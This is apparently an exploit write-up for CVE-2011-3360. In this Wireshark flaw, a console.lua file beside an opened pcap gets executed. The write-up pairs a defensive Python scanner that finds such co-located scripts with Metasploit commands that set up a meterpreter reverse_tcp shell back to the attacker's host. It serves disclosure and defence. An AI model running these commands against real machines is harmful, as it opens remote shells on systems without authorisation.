Timeline :

Vulnerability discovered and reported to the vendor by Haifei Li of MMPC on 2011-07-18
Coordinated release of the vulnerability on 2011-11-15
Metasploit PoC provided on 2011-11-18

PoC provided by :

Haifei Li
sinn3r

Reference(s) :

CVE-2011-3360
OSVDB-75347
MSVR11-014

Affected version(s) :

Wireshark 1.6.1 and earlier

Tested on Windows XP Pro SP3 with :

Wireshark 1.6.1

Description :

This module exploits a vulnerability in Wireshark 1.6 or earlier. When opening a pcap file, Wireshark checks whether there is a ‘console.lua’ file in the same directory and, if one is found, parses and executes the script. Versions affected by this vulnerability: 1.6.0 to 1.6.1 and 1.4.0 to 1.4.8.
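A defensive check for the condition described above, added here as an example and not part of the original post or the Metasploit module: it walks a directory tree and reports every ‘console.lua’ that sits in the same directory as a capture file. The list of capture extensions and the function names are assumptions, and the directory tree in `demo()` is constructed sample data.

```python
import os
import tempfile

# Capture extensions are an assumption; extend to match what your analysts open.
CAPTURE_EXTS = {".pcap", ".pcapng", ".cap"}
SCRIPT_NAME = "console.lua"  # file name given in the description above


def find_colocated_scripts(root):
    """Return [(script_path, [capture_paths])] for every directory under root
    that holds both a console.lua and at least one capture file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        # Windows file systems are case-insensitive, so compare lowercased names.
        scripts = [f for f in files if f.lower() == SCRIPT_NAME]
        captures = sorted(
            f for f in files if os.path.splitext(f)[1].lower() in CAPTURE_EXTS
        )
        if scripts and captures:
            for s in scripts:
                findings.append(
                    (os.path.join(dirpath, s),
                     [os.path.join(dirpath, c) for c in captures])
                )
    return findings


def demo():
    """Build a constructed directory tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        layout = {
            "share/incident": ["trace.pcap", "Console.LUA"],  # should be flagged
            "share/clean": ["trace.pcapng"],                   # capture only
            "tools/plugins": ["console.lua"],                  # script only
        }
        for rel, names in layout.items():
            d = os.path.join(root, *rel.split("/"))
            os.makedirs(d)
            for n in names:
                with open(os.path.join(d, n), "wb") as fh:
                    fh.write(b"")
        return [
            (os.path.relpath(s, root).replace(os.sep, "/"),
             [os.path.basename(c) for c in caps])
            for s, caps in find_colocated_scripts(root)
        ]


if __name__ == "__main__":
    for script, caps in demo():
        print(f"{script} sits beside {caps}")
```

Run `find_colocated_scripts()` against download folders and shared drives where capture files are exchanged; a hit is worth reviewing before anyone opens the capture with an affected Wireshark version.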

Commands :

use exploit/windows/misc/wireshark_lua
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo